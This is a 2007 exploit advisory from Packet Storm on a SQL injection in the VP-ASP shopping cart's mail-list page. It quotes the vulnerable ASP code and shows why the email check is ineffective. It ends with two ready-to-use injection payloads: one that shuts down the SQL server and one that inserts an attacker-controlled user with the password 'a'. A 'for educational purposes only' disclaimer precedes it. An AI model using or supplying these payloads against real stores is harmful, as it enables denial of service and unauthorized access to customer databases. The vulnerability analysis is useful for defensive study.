VP-ASP-SQL.txt

2007-05-03T00:00:00
ID PACKETSTORM:56361
Type packetstorm
Reporter tracewar
Modified 2007-05-03T00:00:00

Description

                                        
                                            `  
************************************************** !!! WARNING !!! ***********************************************************  
* FOR EDUCATIONAL PURPOSES ONLY! *  
******************************************************************************************************************************  
* Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect *  
* or punitive damages arising out of access to, inability to access, or any use of the content of this advisory, *  
* including without limitation any PC, other equipment or other property, even if I am Expressly advised of *  
* the possibility of such damages. I DO NOT encourage criminal activities. If you use this advisory or commit *  
* criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring, *  
* and/or reading anything from this advisory you are considered to have accepted the terms and conditions and have read *  
* this disclaimer. Once again this advisory is for educational purposes only. *  
******************************************************************************************************************************  
  
* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *  
  
VP-ASP x.x.x shopmaillist.asp SQL Injection (TESTED ON 5.xx/6.00>?) discovered by tracewar(tracewar@gmail.com).  
  
the SQL injection exists in the UpdateCustomer procedure:  
  
Sub UpdateCustomer  
if getconfig("xMYSQL")="Yes" then  
MYSQLMaillistUpdateCustomer  
exit sub  
end if   
dim dbc, whereok  
dim doupdate, templastname  
OpenCustomerDb dbc  
Set objRS = Server.CreateObject("ADODB.Recordset")  
templastname=replace(strlastname,"'","''")  
SQL = "SELECT * FROM " & dbtable & " WHERE "  
whereok=""  
sql=sql & whereok & " LastName='" & TempLastName & "'"  
whereok = " AND "  
SQL = SQL & whereok & " email='" & stremail & "'"  
objRS.open SQL, dbc, adOpenKeyset, adLockOptimistic, adcmdText  
'debugwrite sql  
if not ObjRS.eof then  
DoUpdate="True"  
else  
objRs.close  
set objRS=nothing   
end if   
If Doupdate="" then  
Set objRS = Server.CreateObject("ADODB.Recordset")  
objRS.open dbtable, dbc, adOpenKeyset, adLockOptimistic, adCmdTable   
objRS.AddNew  
end if  
Updateminimuminfo objrs  
CloseRecordset objRS  
ShopCloseDatabase dbc  
end sub   
  
If you keep tracking the code you will notice the "stremail" query isn't checked properly for SQL injections:  
  
Else  
ValidateData()  
if sError = "" Then  
If unsubscribe="" then  
UpdateCustomer  
SendMailToMerchant LangMailListRegistration  
WriteInfo  
  
the ValidateData() procedure is totally useless:  
  
Sub ValidateData  
strFirstname = Request.Form("strFirstname")  
strLastname = Request.Form("strLastname")  
strEmail = Request.Form("strEmail")  
unsubscribe=request("blnmaillist")  
ValidateMininumInfo  
End Sub  
  
  
Sub ValidateMininumInfo  
BlnMailList=TRUE  
If strLastname = "" Then  
sError = sError & LangCustLastname & LangCustRequired & "<br>"  
End If   
If strEmail = "" Then  
sError = sError & LangCustEmail & LangCustRequired & "<br>"  
Else  
CustomerValidateEmail stremail  
end If   
end sub  
  
Sub CustomerValidateEmail (stremail)  
If Not InStr(strEmail, "@") > 1 Then  
Serror=Serror & LangInvalidEmail & "<br>"  
end if  
End sub  
  
the query must contain @ as a first character in order to pass the CustomerValidateEmail useless procedure.  
oh and this is also the reason why sql injection scanners didn't detect this injection earlier(HMPF HMPF *TIP* :P)  
  
quick hack:  
  
write this as email: JUNK@';shutdown--  
in order to shutdown the sql server.  
  
write this as email: asdsadd@asdd.com';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a')--  
in order to add user 'a' with password 'a'.  
  
THE END.  
  
* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *`